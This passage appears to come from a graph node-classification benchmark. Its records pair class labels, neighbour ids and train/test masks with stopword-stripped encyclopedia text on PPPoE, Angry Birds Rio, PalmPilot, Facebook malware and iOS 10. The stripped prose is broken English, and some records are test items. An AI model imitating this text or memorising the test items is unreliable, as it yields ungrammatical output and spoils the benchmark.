    "text": "Point-to-Point_Protocol_over_Ethernet:point-to-point protocol ethernet point-to-point protocol ethernet pppoe network protocol encapsulating ppp frames inside ethernet frames appeared 1999 context boom dsl solution tunneling packets dsl connection isp ip network rest internet 2005 networking book noted dsl providers use pppoe provides authentication encryption compression typical use pppoe involves leveraging ppp facilities authenticating user username password predominately via pap protocol less often via chap customer-premises equipment pppoe may implemented either unified residential gateway device handles dsl modem ip routing functions case simple dsl modem without routing support pppoe may handled behind separate ethernet-only router even directly user computer support pppoe present operating systems ranging windows xp linux mac os x recently gpon-based instead dsl-based residential gateways also use pppoe although status pppoe gpon standards marginal pppoe developed uunet redback networks ericsson routerware wind river systems available informational rfc 2516 world dsl pppoe commonly understood running top atm dsl underlying transport although limitation exists pppoe protocol usage scenarios sometimes distinguished tacking suffix another underlying transport example pppoeoe transport ethernet case metro ethernet networks notation original use pppoe would labeled pppoeoa although confused pppoa different encapsulation protocol pppoe described books layer 2.5 protocol rudimentary sense similar mpls used distinguish different ip flows sharing ethernet infrastructure although lack pppoe switches making routing decision based pppoe headers limits applicability respect late 1998 dsl service model yet reach large scale would bring prices household levels adsl technology proposed decade earlier potential equipment vendors carriers alike recognized broadband cable modem dsl would eventually replace dialup service hardware customer premises lec faced significant low-quantity cost barrier initial estimates low-quantity deployment dsl showed costs 300– 500 range dsl modem 300/month access fee telco well beyond home user would pay thus initial focus small home business customers t1 line time 800– 1500 per month economical needed dialup isdn could deliver enough customers paved way quantities would drive prices home-use dialup user might interested like 50 modem 50/month access problem small business customers different usage profile home-use dialup user including requirements n't lend connection establishment lag dialup process one-computer-to-one-isp model even many-to-one nat dialup provided new model required pppoe used mainly either problem creating completely new protocol fill needs time equipment available immediately service whole new protocol stack microsoft time advocating fiber-based atm-cells-to-the-desktop l2tp brewing well near completion would take long implement window opportunity might slip several decisions made simplify implementation standardization effort deliver complete solution quickly pppoe hoped merge widespread ethernet infrastructure ubiquitous ppp allowing vendors reuse existing software deliver products near term essentially operating systems time ppp stack design pppoe allowed simple shim line-encoding stage convert ppp pppoe competing wan technologies t1 isdn required router customer premises pppoe used different ethernet frame type allowed dsl hardware function simply bridge passing frames wan ignoring others implementation bridge multiple orders magnitude simpler router rfc 2516 initially released informational rather standards-track rfc reason adoption period standards-track rfc prohibitively long pppoe initially designed provide small lan individual independent connections internet large also protocol would lightweight enough would n't impinge hoped-for home usage market finally arrived success second matter may debated complain 8 bytes per packet much pppoe clearly succeeded bringing sufficient volume drive price service home user would pay pppoe two distinct stages since traditional ppp connections established two end points serial link atm virtual circuit already established dial-up ppp frames sent wire sure reach end ethernet networks multi-access node network access every node ethernet frame contains hardware address destination node mac address helps frame reach intended destination hence exchanging ppp control packets establish connection ethernet mac addresses two end points known encoded control packets pppoe discovery stage exactly also helps establish session id used exchange packets mac address peer known session established session stage start although traditional ppp peer-to-peer protocol pppoe inherently client-server relationship since multiple hosts connect service provider single physical connection discovery process consists four steps host computer acts client access concentrator internet service provider end acts server outlined fifth last step way close existing session padi stands pppoe active discovery initiation user wants dial internet using dsl computer first must find dsl access concentrator dsl-ac user internet service provider point presence pop communication ethernet possible via mac addresses computer know mac address dsl-ac sends padi packet via ethernet broadcast mac ff ff ff ff ff ff padi packet contains mac address computer sending example padi-packet src =source holds mac address computer sending padi. br dst =destination ethernet broadcast address br padi packet received one dsl-ac dsl-ac equipment serve service-name tag reply pado stands pppoe active discovery offer user computer sent padi packet dsl-ac replies pado packet using mac address supplied padi pado packet contains mac address dsl-ac name e.g leix11-erx t-com dsl-ac leipzig name service one pop dsl-ac replies pado packet user computer selects dsl-ac particular pop using supplied name service example pado packet ac-name string data holds ac name case “ ipzbr001 ” arcor dsl-ac leipzig br src holds mac address dsl-ac. br mac address dsl-ac also reveals manufacturer dsl-ac case nortel networks padr stands pppoe active discovery request padr packet sent user computer dsl-ac following receipt acceptable pado packet dsl-ac confirms acceptance offer pppoe connection made dsl-ac issuing pado packet pads stands pppoe active discovery session-confirmation padr packet confirmed dsl-ac pads packet session id given connection dsl-ac pop fully established padt stands pppoe active discovery termination packet terminates connection pop may sent either user computer dsl-ac pppoe used connect pc router modem via ethernet link also used internet access dsl telephone line pppoe atm pppoeoa adsl protocol stack pppoe atm highest overhead popular dsl delivery methods compared example pppoa rfc 2364 amount overhead added pppoeoa dsl link depends packet size absorbing effect atm cell-padding discussed completely cancels additional overhead pppoeoa cases ii pppoeoa aal5 overhead cause entire additional 53-byte atm cell required iii case ip packets pppoe overhead added packets near maximum length ‘ mru ’ may cause ip fragmentation also involves first two considerations resulting ip fragments however ignoring atm ip fragmentation moment protocol header overheads atm payload due choosing ppp pppoeoa high 44 bytes 2 bytes ppp 6 pppoe 18 ethernet mac variable 10 rfc 2684 llc variable 8 aal5 cpcs overhead obtained using llc header option described rfc 2684 pppoeoa compare vastly header-efficient protocol ppp pppoa rfc 2364 vc-mux atm+dsl mere 10-byte overhead within atm payload fact simply 10 bytes 2 bytes ppp zero rfc 2364 8 aal5 cpcs figure 44 bytes aal5 payload overhead reduced two ways choosing rfc 2684 option discarding 4-byte ethernet mac fcs reduces figure 18 bytes 14 ii using rfc 2684 vc-mux option reduces 10 byte llc overhead 2 bytes turns valuable efficiency improvement using vc-mux instead llc atm payload overhead would either 32 bytes without ethernet fcs 36 bytes fcs atm aal5 requires 8-byte-long ‘ cpcs ’ trailer must always present end final cell ‘ right justified ’ run atm cells make aal5 payload packet total atm payload overhead 2 6 18 10 8 44 bytes llc case ethernet mac fcs present 2 6 14 10 8 40 bytes fcs efficient vc-mux case atm payload overhead 2 6 18 2 8 36 bytes fcs 2 6 14 2 8 32 bytes fcs however true overhead terms total amount atm data sent simply fixed additional value – either zero 48 bytes leaving aside scenario iii mentioned earlier ip fragmentation atm cells fixed length payload capacity 48 bytes adding greater extra amount aal5 payload due additional headers may require one whole atm cell sent containing excess last one two atm cells contain padding bytes required ensure cell payload 48 bytes long example case 1500-byte ip packet sent aal5/atm pppoeoa rfc2684-llc neglecting final cell padding moment one starts 1500 2 6 18 10 8 aal5 cpcs trailer 1544 bytes ethernet fcs present else 2 6 14 10 8 40 bytes fcs send 1544 bytes atm requires 33 48-byte atm cells since available payload capacity 32 cells × 48 bytes per cell 1536 bytes quite enough compare case ppp pppoa 1500 2 ppp 0 pppoa rfc 2364 vc-mux 8 cpcs trailer 1510 bytes fits 32 cells real cost choosing pppoeoa plus rfc2684-llc 1500-byte ip packets one additional atm cell per ip packet ratio 33:32 1500 byte packets pppoeoa llc ~3.125 slower pppoa optimal choices pppoeoa header options packet lengths true additional effective dsl overhead due choosing pppoeoa compared pppoa zero extra header overhead enough need additional atm cell particular packet length example 1492 byte long packet sent ppp pppoeoa using rfc2684-llc plus fcs gives us total atm payload 1492 44 1536 bytes 32 cells exactly overhead special case greater using header-efficient pppoa protocol would require 1492 2 0 8 1502 bytes atm payload 32 cells also case packet length 1492 represents optimum efficiency pppoeoa rfc2684-llc ratio terms unless even longer packets allowed using pppoeoa rfc2684 vc-mux header option always much efficient llc option since atm overhead mentioned earlier 32 36 bytes depending whether without ethernet fcs option pppoeoa 1500 byte long packet including overheads ppp pppoeoa using vc-mux equates total 1500 36 1536 bytes atm payload fcs present 32 atm cells exactly thus saving entire atm cell short packets longer header overheads greater likelihood generating additional atm cell worst case might sending 3 atm cells instead two 44 byte header overhead compared 10 byte header overhead 50 time taken transmit data example tcp ack packet ipv6 60 bytes long overhead 40 44 bytes pppoeoa llc requires three 48 byte atm cells ’ payloads comparison pppoa overheads 10 bytes 70 bytes total fits two cells extra cost choosing pppoe/llc pppoa 50 extra data sent pppoeoa vc-mux would fine though 32 36 byte overhead ip packet still fits two cells cases efficient option atm-based adsl internet access choose pppoa rfc2364 vc-mux however pppoeoa required best choice always use vc-mux opposed llc ethernet fcs giving atm payload overhead 32 bytes 2 bytes ppp 6 pppoe 14 ethernet mac fcs 2 rfc 2684 vc-mux 8 aal5 cpcs trailer unfortunately dsl services require use wasteful llc headers pppoe allow efficient vc-mux option case using reduced packet length enforcing maximum mtu 1492 regains efficiency long packets even llc headers mentioned earlier case extra wasteful atm cell generated ethernet lan overhead ppp pppoe fixed 2 6 8 bytes unless ip fragmentation produced pppoe-speaking dsl modem sends receives ethernet frames containing ppp pppoe payload across ethernet link router pppoe-speaking single pc ppp pppoe contributes additional overhead 8 bytes 2 ppp 6 pppoe included within payload ethernet frame added overhead mean reduced maximum length limit so-called ‘ mtu ’ ‘ mru ’ 1500 − 8 1492 bytes imposed example ip packets sent received opposed usual 1500-byte ethernet frame payload length limit applies standard ethernet networks devices support rfc 4638 allows negotiation use non-standard ethernet frames 1508-byte ethernet payload sometimes called ‘ baby jumbo frames ’ allowing full 1500-byte pppoe payload capability advantageous many users cases companies receiving ip packets incorrectly chosen block icmp responses exiting network bad practice prevents path mtu discovery working correctly cause problems users accessing networks mtu less 1500 bytes following diagram shows scenario modem acts pppoeoe-to-pppoa protocol converter service provider offers pppoa service understand pppoe pppoeoa protocol chain optimally efficient design separate modem connected router ethernet alternative technology pppoe merely means connecting dsl-modems ethernet-only router single host pc concerned mechanism employed isp offer broadband services draytek vigor 110 120 130 modems work way transmitting packets bound internet pppoe-speaking ethernet router sends ethernet frames also pppoe-speaking dsl modem modem extracts ppp frames within received pppoe frames sends ppp frames onwards dslam encapsulating according rfc 2364 pppoa thus converting pppoe pppoa diagram area shown ‘ backbone ’ could also atm older networks however architecture service provider-dependent detailed service-provider specific diagram would additional columns area since point-to-point connection established mtu lower standard ethernet typically 1492 vs ethernet 1500 sometimes cause problems path mtu discovery defeated poorly configured firewalls although higher mtus becoming common providers networks usually workaround use tcp mss maximum segment size clamping rewrite whereby access concentrator rewrites mss ensure tcp peers send smaller datagrams although tcp mss clamping solves mtu issue tcp protocols icmp udp may still affected rfc 4638 allows pppoe devices negotiate mtu greater 1492 underlying ethernet layer capable jumbo frames vendors cisco juniper example distinguish pppoe oa pppoeoe pppoe ethernet pppoe running directly ethernet ieee 802 networks ethernet bridged atm order distinguish pppoeoa pppoe atm pppoe running atm virtual circuit using rfc 2684 snap encapsulation pppoe pppoeoa point-to-point protocol atm pppoa n't use snap according cisco document pppoeoe variant pppoe layer 2 transport protocol ethernet 802.1q vlan instead atm encapsulation method generally found metro ethernet ethernet digital subscriber line access multiplexer dslam environments common deployment model encapsulation method typically found multi-tenant buildings hotels delivering ethernet subscriber available bandwidth much abundant ease service delivery increased possible find dsl modems draytek vigor 120 pppoe confined ethernet link dsl modem partnering router isp speak pppoe rather pppoa certain method using pppoe conjunction gpon involves creating vlan via omci patented zte pppoe gpon reportedly used retail service providers internode australia national broadband network romania rcs rds fiberlink customers — gpon sold ethernet ports mdus orange france philippines globe telecom verizon fios product uses dhcp states pppoe others rfc 6934 applicability access node control mechanism pon based broadband networks argues use access node control protocol pons for—among things—authenticating subscriber access managing ip addresses first author verizon employee excludes pppoe acceptable encapsulation gpon protocol encapsulation bpon based multi-protocol encapsulation atm adaptation layer 5 aal5 defined rfc2684 covers ppp ethernet pppoe defined rfc2516 ip ethernet ipoe protocol encapsulation gpon always ipoe 10g-pon xg-pon standard g.987 provides 802.1x mutual authentication onu olt besides omci method carried forward g.984 g.987 also adds support authenticating customer-premises equipment beyond onu e.g mdu although limited ethernet ports also handled via 802.1x onu supposed snoop eap-encapsulated radius messages scenario determine authentication successful modicum support pppoe specified omci standards terms onu able filter add vlan tags traffic based encapsulation parameters includes pppoe among protocols onu must able discern broadband forum tr-200 using epon context tr-101 2011 also pertains 10g-epon says olt multiple-subscriber onu must able perform pppoe intermediate agent function specified section 3.9.2/tr-101 book ethernet first mile notes dhcp obviously used instead pppoe configure host ip session although points dhcp complete replacement pppoe encapsulation also desired although vlan bridges fulfill function furthermore dhcp provide subscriber authentication suggesting ieee 802.1x also needed complete solution without pppoe book assumes pppoe leveraged features ppp besides encapsulation including ipcp host configuration pap chap authentication security reasons use pppoe non-dsl/atm shared-medium environment power line communication networks order create separate tunnels customer",
    "neighbors": [
      8192,
      7817,
      9868,
      8211,
      11413,
      5402,
      2080,
      6436,
      2087,
      10924,
      3629,
      2222,
      6834,
      9909,
      2998,
      823,
      3383,
      5433,
      8640,
      7364,
      2887,
      8265,
      10058,
      5470,
      5472,
      1121,
      10851,
      5991,
      8432,
      7411
    ],
    "mask": "None"
  },
  {
    "node_id": 1619,
    "label": 2,
    "text": "Angry_Birds_Rio:angry birds rio angry birds rio third puzzle video game angry birds series developed published rovio mobile based angry birds angry birds rio released devices using apple ios mac os x well google android march 2011 game released marketing tie-in 20th century fox blue sky studios animated films rio rio 2 promoted movies utilizing basic gameplay original game angry birds rio added number new elements notably first use boss levels rio angry birds kidnapped taken rio original angry birds players use slingshot launch birds nearby structures intent hitting targets located within instead pigs stolen eggs players must rescue caged exotic birds defeat nigel marmosets depending level played game setting several characters rio make appearances blu jewel feature types bird exclusive game along existing birds series game also includes first boss fights appear series player uses birds defeat nigel main antagonist film well mauro leader marmosets levels luiz helps defeat marmosets destroys materials blocks get player extra points well hidden items collect player progresses game angry birds rio initially included two chapters smugglers den jungle escape 30 levels since game expanded three additional 30-level chapters called beach volley released may 2011 carnival upheaval released june 2011 airfield chase released august 2011 along 15-level chapter golden beachball unlocked finding hidden item beach volley ios android entering redeem code rio dvd pc mac final chapter named smugglers plane released november 2011 released initially 15 levels final 15 levels released later january 2012 chapter special fruit may rarely found gold smugglers den pineapples jungle escape bananas beach volley watermelons carnival upheaval papayas airfield chase apples smugglers plane mangoes market mayhem strawberries rocket rumble golden rockets july 2013 golden beachball episode received 15 levels golden cherries new background episode available start game march 2012 trophy room update released 12 new levels unlocked player finishes chapter collects 15 certain golden fruit update first released android amazon appstore ad-free version making way ios december 18 2012 new update landed ios android adding 24 new levels levels earned getting 30 70 stars episode earning 10 mighty eagles feathers episode 4 extra levels episode episode also added power-ups power-ups super seeds sling scope angry birds original app 2 new power-ups samba burst tnt drop seen previous angry birds friends christmas tournament march 11 2013 another update released adding market mayhem episode 34 levels 3 stars levels 1 mighty eagle level july 25 2013 ab rio app icon updated golden beachball added golden fruit 15 new levels addition trophy room levels combined episode earned four angry birds rio episodes — visually tied rio 2 released december 2013 july 2014 episodes featured refreshed graphics timber tumble episode adds hint feature tells sling bird july 2015 game update added bird coins allow players unlock levels previously locked 2012 electronic entertainment expo los angeles california rovio distribution partner activision announced plans bring angry birds rio two games original angry birds angry birds seasons playstation 3 xbox 360 nintendo 3ds systems bundled together angry birds trilogy games built specifically respectively angry bird consoles taking advantage unique features support playstation move kinect high-definition displays glasses-free 3d visuals also available wii wii u part angry birds trilogy game received generally favorable reviews metacritic score 87/100 based 18 reviews ryan rigney gamepro saying ios version boasts notable improvements predecessors levi buchanan ign review android version calling game smart snappy new chapter series jim squires gamezebo complimented game attempts add new material mechanics saying evolution needs happen wants long term staying power mario pac-man however squires take issue new boss battles calling little anti-climactic tracy erickson pocket gamer noted angry birds rio lacks new ideas freshness makes quality gameplay good value since release angry birds rio downloaded 10 million times one top downloaded games apple app store google play",
    "neighbors": [
      9605,
      9063,
      8937,
      6797,
      57,
      8413,
      3039
    ],
    "mask": "Test"
  },
  {
    "node_id": 1620,
    "label": 2,
    "text": "Conflict_Resolver:conflict resolver conflict resolver application used apple sync services data synced services like mobileme gmail devices like macs pcs mobile devices sync services utilized several applications including address book ical mail conflict resolver executed event sync service decide version data use creating conflict user prompted choose version data use mobileme local whether user wishes apply changes conflicts review individually conflict resolver resides /system/library/privateframeworks/syncservicesui.framework/versions/a/resources/conflict resolver.app versions mac os x since 10.5 mac os x 10.4 application located /system/library/coreservices/conflict resolver.app",
    "neighbors": [
      5784,
      7983
    ],
    "mask": "Train"
  },
  {
    "node_id": 1621,
    "label": 3,
    "text": "PalmPilot:palmpilot palmpilot personal palmpilot professional second generation palm pda devices produced palm inc subsidiary u.s. robotics devices launched march 10 1997 palm also sold 10201u modem 14.4 kbit/s introduced price 129 modem also compatible palm iii palm iiix devices upgrade kit also available allowed users earlier pilot 1000/5000 devices upgrade os rom ram match palmpilot professional initially suggested retail prices upon launch 399 palmpilot professional 1mb 299 palmpilot personal 512kb 199 upgrade kit upgrade kits also available existing registered pilot users 99 limited time launch kits included ir capability new plastic memory door accommodate ir diodes memory card 1 mb new rom palm os 2.0 cd-rom updated desktop software",
    "neighbors": [
      2308,
      10500,
      6790,
      3606,
      8982,
      6178,
      5164,
      7983,
      9013,
      694,
      1603,
      5318,
      11337,
      9037,
      2258,
      4832,
      1121,
      4449,
      2285,
      1776,
      2420,
      8952,
      9598,
      4479
    ],
    "mask": "None"
  },
  {
    "node_id": 1622,
    "label": 4,
    "text": "Facebook_malware:facebook malware social media platform social networking service facebook affected multiple times history intentionally harmful software known malware pose particular challenges users platform well personnel tech-company fighting entities create topic ongoing malware analysis attacks known phishing attacker pretends trustworthy entity order solicit private information increased exponentially 2010s posed frustrating challenges facebook particular tricks involving urls common attackers maliciously use similar website nowiki http //faceb0ok.com/ /nowiki instead correct nowiki http //facebook.com/ /nowiki example 11th international conference detection intrusions malware vulnerability assessment dimva held july 2014 issued report condemning one common tricks mobile computing users especially vulnerable terms applications facebook also visually copied phishing attackers aim confuse individuals thinking something else legitimate facebook log-in screen 2013 variant dorkbot malware caused alarm spreading facebook internal chat service suspected efforts cybercriminals harvest users passwords affecting individuals nations germany india portugal united kingdom antivirus organization bitdefender discovered several thousand malicious links taking place twenty-four hour period contacted facebook administration problem infection contained unusual nature sparked interest given attackers exploited flaw file-sharing site mediafire proliferate phony applications among victims facebook friends real computer worm koobface surfaced 2008 via messages sent facebook myspace later became subject inflated grandiose claims effects spread point internet hoax later commentary claimed link malware messages barack obama administration never actually existed david mikkelson snopes.com discussed matter fact-checking article vein actions google microsoft company administration willing hire grey hat hackers acted legally ambiguously past assist various functions programmer social activist george hotz also known nickname geohot example july 29 2011 facebook announced effort called bug bounty program certain security researchers paid minimum 500 reporting security holes facebook website company official page security researchers stated give us reasonable time respond report making information public make good faith effort avoid privacy violations destruction data interruption degradation service research bring lawsuit ask law enforcement investigate effort attracted notice publications pc magazine noted individuals must first report security glitch must also find problem native facebook rather entity merely associated farmville late 2017 facebook systematically disabled accounts operated north koreans response government use state-sponsored malware attacks microsoft similar actions north korean government attracted widespread condemnation u.s. elsewhere alleged proliferation wannacry malware said computer worm affected 230,000 computers 150 countries throughout 2017",
    "neighbors": [
      8,
      7560,
      5325,
      9518,
      5935,
      6288,
      7515,
      10166,
      2041,
      5435,
      10141,
      9375
    ],
    "mask": "Test"
  },
  {
    "node_id": 1623,
    "label": 2,
    "text": "IOS_10:ios 10 ios 10 tenth major release ios mobile operating system developed apple inc. successor ios 9 announced company worldwide developers conference june 13 2016 released september 13 2016 succeeded ios 11 september 19 2017. ios 10 incorporates changes 3d touch lock screen new features apps messages additional emojis third-party apps extend functionality imessage maps redesigned interface additional third-party functions home app manages homekit -enabled accessories photos algorithmic search categorization media known memories siri compatible third-party app-specific requests starting workouts apps sending ims using lyft uber use payment functions reviews ios 10 mostly positive reviewers highlighted significant updates imessage siri photos 3d touch lock screen welcome changes third-party extension support imessage meant becoming platform although user interface criticized difficult understand third-party integration siri great although voice assistant criticized become smarter reviewers impressed image recognition technology photos although noting still work progress higher error rate competition 3d touch finally feels useful works almost every part os lock screen far customizable reviewers enjoyed notification bubbles could expanded see information without needing unlock phone month release ios 10 installed 54 ios devices slightly slower migration release ios 9 speculated caused early release issue may put users downloading update user adoption ios 10 steadily increased following months eventually totaling 89 active devices september 2017. ios 10 introduced apple worldwide developers conference keynote address june 13 2016 first beta release made available registered developers following keynote apple released first public beta release july 7 2016. ios 10 officially released september 13 2016. ios 10.0.1 released september 13 2016 first update ios 10 released 10.0 contained bug causing devices brick updating ios 10.0.2 released september 23 2016 update contained bug fixes specifically fixing bug temporarily disabled headphone controls lightning earpods ship iphone 7 fixing bug preventing app extensions enabled fixing unexpected crash photos app activating icloud photo library ios 10.0.3 released october 17 2016 exclusively iphone 7 iphone 7 plus models fix connectivity issues ios 10.1 released october 24 2016 new portrait camera mode iphone 7 plus transit directions japan apple maps ability replay bubble screen effects imessage well lots bug fixes ios 10.1 also features warning message launching 32-bit app says app may slow iphone ios 10.1 also allows users use imessage effects even reduce motion setting turned ios 10.1.1 released october 31 2016 fix issue health data could viewed users november 9 2016 apple released new version ios 10.1.1 available users n't yet updated previous 10.1.1 update information new update given ios 10.2 released december 12 2016 update included new tv app u.s. unifies content different video apps recommends new tv shows movies watch update also added new redesigned emoji stabilization photo grouping accuracy changes photos new love celebration messages screen effects notification support homekit-accessories well revamped sorting options design tweaks music app ios 10.2 also adds telemetry diagnostic tool apple use report battery consumption diagnosing reported issues 30 battery shutdowns iphone models ios 10.2 also includes three new wallpapers iphone 7 iphone 7 plus specifically wallpapers featured marketing phones ios 10.2.1 released january 23 2017 bug fixes security improvements december 28 2017 apple acknowledged update changed power management peak workloads avoid unexpected shutdowns iphone 6 iphone 6 plus iphone 6s iphone 6s plus iphone se customers upset update thought ploy get people upgrade new devices number people filed lawsuits feature seeking class action status ios 10.3 released march 27 2017 update introduced find airpods feature lost airpods headphones changed default file system hfs+ apfs improved performance encryption also increases usable storage device support additional siri actions including status bills payment apps scheduling ride-booking apps new apple id view settings ability developers respond reviews app store well helpful helpful review labels improved overview icloud storage usage bug fixes stability improvements users also give app ratings inside app ios 10.3 also features significant security patch fixing issue javascript exploit link would cause devices repeatedly call 9-1-1 emergency phone number update also added podcasts widget made app transitions smoother extended support wi-fi calling carriers carplay update added quick-access multitasking screen three recently used apps added functionality maps app find electric vehicle charging stations ios 10.3.1 released april 3 2017 bug fixes security improvements including fix wi-fi vulnerability discovered google project zero team security researchers ios 10.3.2 released may 15 2017 bug fixes security improvements ios 10.3.3 released july 19 2017 new wallpapers 12.9-inch ipad pro along bug fixes security improvements including fix wi-fi vulnerability devices searching signal open hackers ios 10.3.4 released july 22 2019 address issue could impact gps location performance could cause system date time incorrect available exclusively iphone 5 cellular model ipad 4th generation control center redesigned split three pages one general settings quick toggles airplane mode orientation lock one audio controls one controlling homekit internet things appliances used 3d touch capabilities added several toggles apps show widget home-screen icon accessed 3d touch default apps included ios devices hidden home screen 're-downloaded app store upon sandbox respective app removed contains user data settings caches app also hidden places today view settings app share sheets user interact app within another app feature first hinted interview september 2015 apple ceo tim cook stated apple looking allowing customers remove unused stock apps ios 10 allows users prioritize certain app downloads using 3d touch quicktype virtual keyboards provide word-completion capabilities predict answers questions suggest relevant information based location calendar availability contacts define feature previous ios versions replaced look expands use providing definitions retrieving information locations web browsing history downloaded apps suggested websites quicktype keyboard allow user type multiple languages user selects desired languages dictionary keyboard settings menus user ability change keyboard settings specifically physical keyboards autocorrect auto-capitalization slide unlock mechanism lock screen removed favor pressing home button similar feature apple watch raise wake wakes device user lifts function requires device m9 motion coprocessor newer today view notification center replaced widgets accessible swiping left right ipad widgets displayed two-column layout notification center longer today view notifications larger expand display information unread notifications cleared using 3d touch apps need updated frequently notifications update live notification center contains spotlight search bar new magnifier setting added allows users triple-click home button ios open camera app magnification also new color filters settings compensate user color blindness color filters options include grayscale red/green filter protanopia green/red filter deuteranopia blue/yellow filter tritanopia messages application users turn low quality image mode saves poor iphone stuffing full images based new animated stickers gifs sent imessage wi-fi menu settings shows warnings security network network connected internet shown user small subtext wi-fi network name raise wake enabled disabled settings ios 10.2 preserve settings feature allows users set camera app launch certain settings default options include launching video square mode rather photo mode preserving last used filter preserving capture settings live photos music added apple music one device automatically downloaded devices using automatic downloads setting settings allows user option routes maps app avoid toll roads and/or highways ios 10.3 settings updated feature information relating user apple id account main menu features section allows users see old unmaintained apps wo n't work future versions ios additionally users see breakdown icloud storage user enable setting siri announce calling options always headphones car headphones never ios 10 allows users rearrange remove apps carplay display settings ios 10.3 maps carplay added electric vehicle charging stations part overall continuity features introduced ios 8 new universal clipboard feature allows users mac personal computers running macos sierra ios devices running ios 10 easily copy material different devices icloud part continuity new continuity keyboard feature allows users type text iphone text appear apple tv running tvos 10 avoiding siri remote text input ios 10 features new sound effects locking device keyboard clicks whenever device detects liquid lightning port notice warns user disconnect lightning cable allow port dry ios 10 also allows tty calls made without additional hardware ios 10 allows users find apple watch using find iphone spotlight search contents users icloud drive storage reported user base 10 1 kilobyte equals 1000 bytes format instead base 2 used older ios versions ios 10 allows developers buy advertisement spots app store users search content also adds back categories section replaces explore section introduced ios 8 ios 10.3 developers able respond user reviews helpful helpful review labels help surface relevant customer reviews ios 10 users change day week calendar starts well alert settings birthdays events calendar type gregorian chinese hebrew islamic music longer stop playing camera app launched unless users decide record video take live photo.live photos taken filters previously available still photos ios 10.1 iphone 7 plus received new depth field portrait camera mode using wide-angle telephoto lenses phone create shallow depth field portrait photos blurred backgrounds clock app dark theme new bedtime feature reminds user go bed get desired amount sleep also new stopwatch face accessed swiping left contacts app ios 10 allows users set default phone numbers email addresses contacts multiple numbers addresses app also allows user add remove contacts favorite contacts list home new app allows users manage appliances compatible homekit apple api home automation app users add compatible homekit accessories locks lights thermostats directly control appliances app scenes panel allows many devices controlled fit mood setting geo-fencing activates scheduled sequences following user location mail app allows users unsubscribe mailing lists unsubscribe button users dismiss message unsubscribe particular mailing list tapping x top right corner preventing mail app displaying unsubscribe button mailing list later apple added back support html5 video mail previously stopped ios 8 mail filter messages either unread/read categories ios 10 also changes email threading works placing oldest email top default option settings lets users revert previous threading system recent message top additionally new threaded conversations allow users tap message see scrollable stream messages inside thread maps redesigned updated additional features including scanning calendar events locations learning user typical actions redesigned driving view marker automatically placed indicate user parked car marker also tell user last parked car notes field allows user enter information parking garage number app app helps users find nearest gas station fast-food restaurant coffee shop swiping bottom screen maps also estimates long detour take users add third-party extensions maps app enable additional functionality restaurant-booking extension help user reserve table inside maps app users pan zoom navigation mode app displays current temperature weather conditions bottom right corner ios 10.3 app also allows user see weather forecast using 3d touch current temperature functionality allows users see hour-by-hour breakdown area looking messages app incorporates app store lets users download third-party imessage apps accessed within imessage conversations users use send stickers play games send rich content media previews recipients messages app store three navigation fields featured categories manage app updated include many visual effects chat bubbles example sent loud gentle animation recipient sees upon receiving invisible ink effect obscures message recipient swipes across full-screen effects like balloons confetti fireworks sent also support interactions similar apple watch sending quick sketches recording sending user heartbeat order use screen bubble effects reduce motion setting needs turned messages allows users send handwritten notes done turning device landscape mode iphones landscape portrait ipad users tapping handwriting squiggle messages app automatically saves recently used notes make easier send handwritten message deleted way app deleted holding message pressing delete message also saved picture file new emojis added well additional features related emoji emojis appear 3x bigger messages sent three emojis text keyboard predict emojis use emoji replacement feature attempts match words messages replace emojis meaning since game center app removed messages handles actions inviting friends game read receipts turned individual contacts rather contacts music app redesigned emphasis placed usability section reorganized playlist offering daily music recommendations new tab renamed browse new tab music downloaded called downloaded music added lyrics viewable songs in-app ios 10 search tab includes recent trending searches optimized storage option removes downloaded music user n't played news app taking cues music layout redesigned incorporate bold headings newspaper-esque layout redesigned tab news also features support subscriptions provides notifications breaking news notes collaboration feature allows users share note collaborate users add remove text note users tap round yellow badge person plus sign send invitations text email link apple added deep learning capabilities sorting searching photos app new memories feature automatically recognize compile related photos create short shareable music videos local facial recognition functionality added bundle together pictures certain people ios 10 allows users add doodles text photo using new markup feature user edits live photo using markup image turned still image live photos edited photos app allows users trim clip change still frame add filter add digital image stabilization live photo buttery smooth app also upgraded auto-enhance feature adds brilliance slider phone app transcribe received visual voicemails siri announce name phone number incoming calls system mark suspected spam callers call screen upon incoming calls contacts enabled emergency bypass phone always make sounds vibrations receiving notifications chosen contacts even disturb mode favorites screen users customize action favorited contact enable click including call facetime sms email users save voicemails airdrop imessage icloud drive apps share menu apple pay available safari app limit many tabs users open time supported ipads safari unique split view viewing two safari browser tabs 50/50 mode next users also search keywords specific tabs close tabs single click reopen recently closed tabs long-pressing plus icon users also search items bookmarks reading list included ios 10.2 update tv app app available united states offers simple unified experience content different video apps long service supports feature new app replaces videos app found previous ios versions ios 10 gives third-party developers access apis three major ios system apps services siri imessage maps developers ios 10 allows third-party camera apps capture raw image format pictures support shooting photos adobe dng raw format limited devices least 12mp camera third-party app supports apple enable feature native camera app ios 10 allows voip apps functionality interface phone facetime apps use callkit api native support vpn protocol pptp removed apple recommends alternatives considers secure options group notifications app notification center customize order notifications removed game center app removed case macos sierra review verge dieter bohn wrote new features introduced ios 10 evolution design interaction ideas apple working couple years wrote imessage becoming platform although liked extensions mean access information apps without needing open respective apps wrote new imessage interface difficult understand use third-party apps stickers crazy confetti effects emoji place nightmare although finishing maybe wonderland nightmare call regarding third-party support siri called great noting limited class apps calls messaging payments photos ride-sharing apps carplay systems workouts sometimes button press required complete process beyond app integrations criticized siri writing siri n't seem gotten whole lot smarter remember bohn enjoyed new machine learning technology present photos app writing impressed apple image recognition technology noted done locally device criticize error rate compares technology google photos step ahead bohn liked new designs music maps apps saying redesigns better bohn particularly enjoyed new lock screen highlighted notification bubbles 3d touch-ed access information without needing unlock phone small bits new features liked included deletable apps upgraded widgets 3d touch-ing home screen icon breaking news notifications apple news overall bohn referred ios 10 still walled garden doors engadget devindra hardawar wrote ios 10 apple basically polishing pearl hardawar noted major changes release focus features rather visual interface wrote lock screen far customizable praised new features added 3d touch writing finally feels useful likes 3d touch works almost every part os regard imessage wrote new features particularly useful including invisible ink obscures text conversation others might looking criticized user interface writing needs work memories feature new photos app usually turned well wrote 're still clearly work progress hardawar praised new apple music app added really anything better last iteration also liked lyrics support wrote siri third-party support actually starting get useful run accuracy issues finished writing although ios 10 add features seen google android operating system mobile industry shamelessly getting inspired competition summary states ios 10 collection useful changes already solid os october 2016 month initial release 54 ios devices running ios 10 slightly slower migration release ios 9 preceding year result speculated macrumors tim hardwick caused early release issue disabled devices may put users downloading update user adoption increased 76 active devices january 2017 79 february 2017 86 june 2017 87 july 2017 89 september 2017 release ios 